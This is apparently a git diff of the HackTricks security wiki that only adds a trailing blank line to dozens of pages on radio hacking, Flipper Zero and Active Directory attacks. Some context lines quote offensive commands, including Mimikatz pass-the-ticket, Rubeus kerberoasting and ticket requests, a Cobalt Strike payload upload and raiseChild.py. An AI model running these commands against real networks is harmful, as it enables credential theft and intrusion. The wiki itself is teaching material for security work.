diff --git a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md index b30cace1c..b76241766 100644 --- a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md +++ b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md @@ -63,3 +63,4 @@ def replace_linear_with_lora(model, rank, alpha): - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) + diff --git a/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md b/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md index dbab34b80..af38e8c8f 100644 --- a/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md +++ b/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md @@ -116,3 +116,4 @@ You can find all the code to fine-tune GPT2 to be a spam classifier in [https:// - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) + diff --git a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md index 05e138b75..edf523301 100644 --- a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md +++ b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md @@ -106,3 +106,4 @@ You can find an example of the code to perform this fine tuning in [https://gith - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) + 
diff --git a/src/todo/llm-training-data-preparation/README.md b/src/todo/llm-training-data-preparation/README.md index 7a381e315..515c506e2 100644 --- a/src/todo/llm-training-data-preparation/README.md +++ b/src/todo/llm-training-data-preparation/README.md @@ -98,3 +98,4 @@ You should start by reading this post for some basic concepts you should know ab {{#endref}} + diff --git a/src/todo/misc.md b/src/todo/misc.md index 8b4e89443..c2bdbee52 100644 --- a/src/todo/misc.md +++ b/src/todo/misc.md @@ -60,3 +60,4 @@ Snow --> Hide messages using spaces and tabs {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/more-tools.md b/src/todo/more-tools.md index 23884e57f..9e13a3f70 100644 --- a/src/todo/more-tools.md +++ b/src/todo/more-tools.md @@ -120,3 +120,4 @@ Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a pla {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/online-platforms-with-api.md b/src/todo/online-platforms-with-api.md index 7ada55681..a019992c2 100644 --- a/src/todo/online-platforms-with-api.md +++ b/src/todo/online-platforms-with-api.md @@ -127,3 +127,4 @@ It detects IP geolocation, data center, ASN and even VPN information. It offers {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/other-web-tricks.md b/src/todo/other-web-tricks.md index f275f5851..c2dfe55bc 100644 --- a/src/todo/other-web-tricks.md +++ b/src/todo/other-web-tricks.md @@ -35,3 +35,4 @@ Developers might forget to disable various debugging options in the production e {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/pentesting-dns.md b/src/todo/pentesting-dns.md index 816c7a6d3..b8527a78f 100644 --- a/src/todo/pentesting-dns.md +++ b/src/todo/pentesting-dns.md @@ -9,3 +9,4 @@ {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/post-exploitation.md b/src/todo/post-exploitation.md index c7385b0c9..9fee7c27c 100644 --- a/src/todo/post-exploitation.md 
+++ b/src/todo/post-exploitation.md @@ -16,3 +16,4 @@ {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/radio-hacking/README.md b/src/todo/radio-hacking/README.md index 8f95deb47..690b761df 100644 --- a/src/todo/radio-hacking/README.md +++ b/src/todo/radio-hacking/README.md @@ -3,3 +3,4 @@ + diff --git a/src/todo/radio-hacking/fissure-the-rf-framework.md b/src/todo/radio-hacking/fissure-the-rf-framework.md index 90210ab19..896c59689 100644 --- a/src/todo/radio-hacking/fissure-the-rf-framework.md +++ b/src/todo/radio-hacking/fissure-the-rf-framework.md @@ -185,3 +185,4 @@ Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions + diff --git a/src/todo/radio-hacking/flipper-zero/README.md b/src/todo/radio-hacking/flipper-zero/README.md index ef20a6fea..588ff7389 100644 --- a/src/todo/radio-hacking/flipper-zero/README.md +++ b/src/todo/radio-hacking/flipper-zero/README.md @@ -18,3 +18,4 @@ With [**Flipper Zero**](https://flipperzero.one/) you can: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md b/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md index 946dc8b8a..c7af1f509 100644 --- a/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md +++ b/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md @@ -55,3 +55,4 @@ After **copying** a card or **entering** the ID **manually** it's possible to ** {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/todo/radio-hacking/flipper-zero/fz-ibutton.md b/src/todo/radio-hacking/flipper-zero/fz-ibutton.md index 9fbd28475..41896b55f 100644 --- a/src/todo/radio-hacking/flipper-zero/fz-ibutton.md +++ b/src/todo/radio-hacking/flipper-zero/fz-ibutton.md @@ -42,3 +42,4 @@ It's possible to **emulate** saved iButtons (read or manually added). {{#include ../../../banners/hacktricks-training.md}} + 
diff --git a/src/todo/radio-hacking/flipper-zero/fz-infrared.md b/src/todo/radio-hacking/flipper-zero/fz-infrared.md index 6534f163b..3cf8ae3a4 100644 --- a/src/todo/radio-hacking/flipper-zero/fz-infrared.md +++ b/src/todo/radio-hacking/flipper-zero/fz-infrared.md @@ -40,3 +40,4 @@ If it doesn't, Flipper can **store** the **signal** and will allow you to **repl {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/todo/radio-hacking/flipper-zero/fz-nfc.md b/src/todo/radio-hacking/flipper-zero/fz-nfc.md index 3e6a68ea0..09b85d577 100644 --- a/src/todo/radio-hacking/flipper-zero/fz-nfc.md +++ b/src/todo/radio-hacking/flipper-zero/fz-nfc.md @@ -79,3 +79,4 @@ However, you **can't read the CVV this way** (the 3 digits on the back of the ca {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md index 215b291d8..ed4dc488b 100644 --- a/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md +++ b/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md @@ -104,3 +104,4 @@ Check the list in [https://docs.flipperzero.one/sub-ghz/frequencies](https://doc {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/todo/radio-hacking/ibutton.md b/src/todo/radio-hacking/ibutton.md index 4598898c6..bc979f03a 100644 --- a/src/todo/radio-hacking/ibutton.md +++ b/src/todo/radio-hacking/ibutton.md @@ -45,3 +45,4 @@ flipper-zero/fz-ibutton.md {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/todo/radio-hacking/infrared.md b/src/todo/radio-hacking/infrared.md index 0fd7aec42..82fd9a9f4 100644 --- a/src/todo/radio-hacking/infrared.md +++ b/src/todo/radio-hacking/infrared.md @@ -81,3 +81,4 @@ flipper-zero/fz-infrared.md {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/todo/radio-hacking/low-power-wide-area-network.md b/src/todo/radio-hacking/low-power-wide-area-network.md index 1051ef019..5dd51512d 100644 
--- a/src/todo/radio-hacking/low-power-wide-area-network.md
+++ b/src/todo/radio-hacking/low-power-wide-area-network.md
@@ -16,3 +16,4 @@ Long Range (**LoRa**) it’s popular in multiple countries and has an open sourc
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 5efb22b22..295e02aee 100644
--- a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -73,3 +73,4 @@ sudo bettercap --eval "ble.recon on"
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/todo/radio-hacking/pentesting-rfid.md b/src/todo/radio-hacking/pentesting-rfid.md
index 13e0b40f6..ce3430754 100644
--- a/src/todo/radio-hacking/pentesting-rfid.md
+++ b/src/todo/radio-hacking/pentesting-rfid.md
@@ -99,3 +99,4 @@ proxmark-3.md
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/todo/radio-hacking/proxmark-3.md b/src/todo/radio-hacking/proxmark-3.md
index ac97439a8..ad968cfe2 100644
--- a/src/todo/radio-hacking/proxmark-3.md
+++ b/src/todo/radio-hacking/proxmark-3.md
@@ -64,3 +64,4 @@ You can create a script to **fuzz tag readers**, so copying the data of a **vali
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/todo/radio-hacking/sub-ghz-rf.md b/src/todo/radio-hacking/sub-ghz-rf.md
index 2c256ae0e..a00e4297b 100644
--- a/src/todo/radio-hacking/sub-ghz-rf.md
+++ b/src/todo/radio-hacking/sub-ghz-rf.md
@@ -87,3 +87,4 @@ Testing against an aftermarket rolling code system installed on a car, **sending
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/todo/references.md b/src/todo/references.md
index 554fdab52..7b4e414f8 100644
--- a/src/todo/references.md
+++ b/src/todo/references.md
@@ -49,3 +49,4 @@
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/todo/rust-basics.md b/src/todo/rust-basics.md
index c85552ae1..2a6cd891b 100644
--- a/src/todo/rust-basics.md
+++ b/src/todo/rust-basics.md
@@ -319,3 +319,4 @@ fn main() {
+
diff --git a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
index 2abdec480..c98b41c17 100644
--- a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
+++ b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
@@ -13,3 +13,4 @@ Here I present you the main ways to can try to achieve it:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/todo/test-llms.md b/src/todo/test-llms.md
index e9eb3e6fa..78f38b18f 100644
--- a/src/todo/test-llms.md
+++ b/src/todo/test-llms.md
@@ -51,3 +51,4 @@ It offers several sections like:
+
diff --git a/src/todo/tr-069.md b/src/todo/tr-069.md
index a8379e36e..46b3c31de 100644
--- a/src/todo/tr-069.md
+++ b/src/todo/tr-069.md
@@ -3,3 +3,4 @@
+
diff --git a/src/welcome/about-the-author.md b/src/welcome/about-the-author.md
index ace23bba7..b9a7c437f 100644
--- a/src/welcome/about-the-author.md
+++ b/src/welcome/about-the-author.md
@@ -13,3 +13,4 @@ HackTricks is also a wiki were **a lot of researches also share their latest fin
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md
index 5ef81c7b8..dc48dd373 100644
--- a/src/welcome/hacktricks-values-and-faq.md
+++ b/src/welcome/hacktricks-values-and-faq.md
@@ -145,3 +145,4 @@ This license does not grant any trademark or branding rights in relation to the
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md
index 92d184d42..6411fe2fe 100644
--- a/src/windows-hardening/active-directory-methodology/README.md
+++ b/src/windows-hardening/active-directory-methodology/README.md
@@ -723,3 +723,4 @@ rdp-sessions-abuse.md
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
index 467ae731b..f83e1ecb9 100644
--- a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
+++ b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
@@ -288,3 +288,4 @@ A strategy that many authors have come up with is to force a SYSTEM service to a
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
index 0bf686666..0eb3cd7fc 100644
--- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
+++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
@@ -202,3 +202,4 @@ Furthermore, additional methods for executing code or maintaining persistence, s
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
index 64ef33b89..f9d1b881c 100644
--- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
@@ -67,3 +67,4 @@ ShadowSpray aims to **exploit GenericWrite/GenericAll permissions that wide user
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates.md b/src/windows-hardening/active-directory-methodology/ad-certificates.md
index b4b2a991b..e78fd7a8c 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates.md
@@ -129,3 +129,4 @@ certutil -v -dstemplate
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/README.md b/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
index ede4e23cb..18a6b64a1 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
@@ -129,3 +129,4 @@ certutil -v -dstemplate
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
index 0f68fef52..8c7d07cf1 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
@@ -55,3 +55,4 @@ This approach allows for an **extended persistence** method, minimizing the risk
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md b/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
index da2621a3b..4a24e738e 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
@@ -117,3 +117,4 @@ This explanation encapsulates the process and tools involved in NTLM credential
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
index f9655eee4..c335d8b40 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@@ -737,3 +737,4 @@ Both scenarios lead to an **increase in the attack surface** from one forest to
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
index 9925066ab..b81659be9 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
@@ -67,3 +67,4 @@ An example of malicious implementation would involve an attacker, who has **elev
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-dns-records.md b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
index ab59ea5b0..a1f51ebe4 100644
--- a/src/windows-hardening/active-directory-methodology/ad-dns-records.md
+++ b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
@@ -20,3 +20,4 @@ For more information read [https://dirkjanm.io/getting-in-the-zone-dumping-activ
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
index 87a193d50..da5d84b04 100644
--- a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
+++ b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
@@ -56,3 +56,4 @@ slapd -d 2
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/asreproast.md b/src/windows-hardening/active-directory-methodology/asreproast.md
index 92e739ff7..9ba53840c 100644
--- a/src/windows-hardening/active-directory-methodology/asreproast.md
+++ b/src/windows-hardening/active-directory-methodology/asreproast.md
@@ -83,3 +83,4 @@ ASRepCatcher listen
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/bloodhound.md b/src/windows-hardening/active-directory-methodology/bloodhound.md
index bcb873aa3..042fa9843 100644
--- a/src/windows-hardening/active-directory-methodology/bloodhound.md
+++ b/src/windows-hardening/active-directory-methodology/bloodhound.md
@@ -97,3 +97,4 @@ To run it, can execute the binary `PingCastle.exe` and it will start an **intera
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/constrained-delegation.md b/src/windows-hardening/active-directory-methodology/constrained-delegation.md
index 5062f036c..4bc4b3f6e 100644
--- a/src/windows-hardening/active-directory-methodology/constrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/constrained-delegation.md
@@ -83,3 +83,4 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/custom-ssp.md b/src/windows-hardening/active-directory-methodology/custom-ssp.md
index f26fcb2bf..04bfcafa2 100644
--- a/src/windows-hardening/active-directory-methodology/custom-ssp.md
+++ b/src/windows-hardening/active-directory-methodology/custom-ssp.md
@@ -46,3 +46,4 @@ Event ID 4657 - Audit creation/change of `HKLM:\System\CurrentControlSet\Control
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/dcshadow.md b/src/windows-hardening/active-directory-methodology/dcshadow.md
index 1d8be7221..2291069dc 100644
--- a/src/windows-hardening/active-directory-methodology/dcshadow.md
+++ b/src/windows-hardening/active-directory-methodology/dcshadow.md
@@ -74,3 +74,4 @@ Notice that in this case you need to make **several changes,** not just one. So,
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/dcsync.md b/src/windows-hardening/active-directory-methodology/dcsync.md
index d81d62eb0..59f936117 100644
--- a/src/windows-hardening/active-directory-methodology/dcsync.md
+++ b/src/windows-hardening/active-directory-methodology/dcsync.md
@@ -74,3 +74,4 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/diamond-ticket.md b/src/windows-hardening/active-directory-methodology/diamond-ticket.md
index 9033c284d..1b95877c7 100644
--- a/src/windows-hardening/active-directory-methodology/diamond-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/diamond-ticket.md
@@ -32,3 +32,4 @@ powershell Get-DomainUser -Identity -Properties objectsid
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
index 08a86a3b3..f9f38abe2 100644
--- a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
@@ -34,3 +34,4 @@ More info about this in: [https://adsecurity.org/?p=1714](https://adsecurity.org
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
index 63aa0f357..f6d83fbd6 100644
--- a/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
+++ b/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
@@ -83,3 +83,4 @@ The cleartext password can be used to perform regular authentication as the trus
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md b/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
index eae19a77e..dbaace7e6 100644
--- a/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
+++ b/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
@@ -129,3 +129,4 @@ Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /d
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/golden-ticket.md b/src/windows-hardening/active-directory-methodology/golden-ticket.md
index f6c5b2729..7884c7a16 100644
--- a/src/windows-hardening/active-directory-methodology/golden-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/golden-ticket.md
@@ -64,3 +64,4 @@ Other little tricks defenders can do is **alert on 4769's for sensitive users**
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/kerberoast.md b/src/windows-hardening/active-directory-methodology/kerberoast.md
index 7a65631be..01cced36c 100644
--- a/src/windows-hardening/active-directory-methodology/kerberoast.md
+++ b/src/windows-hardening/active-directory-methodology/kerberoast.md
@@ -173,3 +173,4 @@ Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"d
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/kerberos-authentication.md b/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
index 609680253..ec26c2475 100644
--- a/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
+++ b/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
index 4b8f52c7f..c0e2c511f 100644
--- a/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
+++ b/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
@@ -105,3 +105,4 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/laps.md b/src/windows-hardening/active-directory-methodology/laps.md
index 96d71e86d..4ff1b91a8 100644
--- a/src/windows-hardening/active-directory-methodology/laps.md
+++ b/src/windows-hardening/active-directory-methodology/laps.md
@@ -143,3 +143,4 @@ Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\T
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
index 871785b98..33089524e 100644
--- a/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
+++ b/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
@@ -44,3 +44,4 @@ To conform to operational security and use AES256, the following command can be
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/pass-the-ticket.md b/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
index 90b709c42..4cbac2655 100644
--- a/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
@@ -47,3 +47,4 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/password-spraying.md b/src/windows-hardening/active-directory-methodology/password-spraying.md
index 25fe03a9c..d4be04cae 100644
--- a/src/windows-hardening/active-directory-methodology/password-spraying.md
+++ b/src/windows-hardening/active-directory-methodology/password-spraying.md
@@ -151,3 +151,4 @@ To use any of these tools, you need a user list and a password / a small list of
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
index 63f1f1b01..5aadead6b 100644
--- a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
+++ b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
@@ -130,3 +130,4 @@ If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlm
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/printnightmare.md b/src/windows-hardening/active-directory-methodology/printnightmare.md
index 702aaf80c..dbc693618 100644
--- a/src/windows-hardening/active-directory-methodology/printnightmare.md
+++ b/src/windows-hardening/active-directory-methodology/printnightmare.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
index 9b947eca6..5a51be49e 100644
--- a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
+++ b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
@@ -308,3 +308,4 @@ Get-NetGroupMember -Identity "Server Operators" -Recurse
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md b/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
index 15fbe4a25..3378c48be 100644
--- a/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
+++ b/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
@@ -75,3 +75,4 @@ beacon> upload C:\Payloads\pivot.exe
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
index 26d91d5e9..c05565162 100644
--- a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
@@ -136,3 +136,4 @@ Lear about the [**available service tickets here**](silver-ticket.md#available-s
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/security-descriptors.md b/src/windows-hardening/active-directory-methodology/security-descriptors.md
index 6021490a5..d99287a4b 100644
--- a/src/windows-hardening/active-directory-methodology/security-descriptors.md
+++ b/src/windows-hardening/active-directory-methodology/security-descriptors.md
@@ -51,3 +51,4 @@ Check [**Silver Tickets**](silver-ticket.md) to learn how you could use the hash
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/sid-history-injection.md b/src/windows-hardening/active-directory-methodology/sid-history-injection.md
index 5352b04b8..24abc3e50 100644
--- a/src/windows-hardening/active-directory-methodology/sid-history-injection.md
+++ b/src/windows-hardening/active-directory-methodology/sid-history-injection.md
@@ -139,3 +139,4 @@ raiseChild.py -target-exec 10.10.10.10 /username
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/silver-ticket.md b/src/windows-hardening/active-directory-methodology/silver-ticket.md
index 632787cf0..9020f1b44 100644
--- a/src/windows-hardening/active-directory-methodology/silver-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/silver-ticket.md
@@ -154,3 +154,4 @@ dcsync.md
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/skeleton-key.md b/src/windows-hardening/active-directory-methodology/skeleton-key.md
index 199fb16d5..3fbc10aa5 100644
--- a/src/windows-hardening/active-directory-methodology/skeleton-key.md
+++ b/src/windows-hardening/active-directory-methodology/skeleton-key.md
@@ -31,3 +31,4 @@ Verification after a system reboot is crucial to ensure that the protective meas
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
index eb9045abe..a51844e60 100644
--- a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
@@ -55,3 +55,4 @@ printers-spooler-service-abuse.md
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs.md b/src/windows-hardening/authentication-credentials-uac-and-efs.md
index b2ef53f75..6c0413bf2 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs.md
@@ -268,3 +268,4 @@ windows-security-controls/uac-user-account-control.md
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
index 201c3f4f5..157a35998 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
@@ -267,3 +267,4 @@ uac-user-account-control.md
 {{#include ../../banners/hacktricks-training.md}}
+
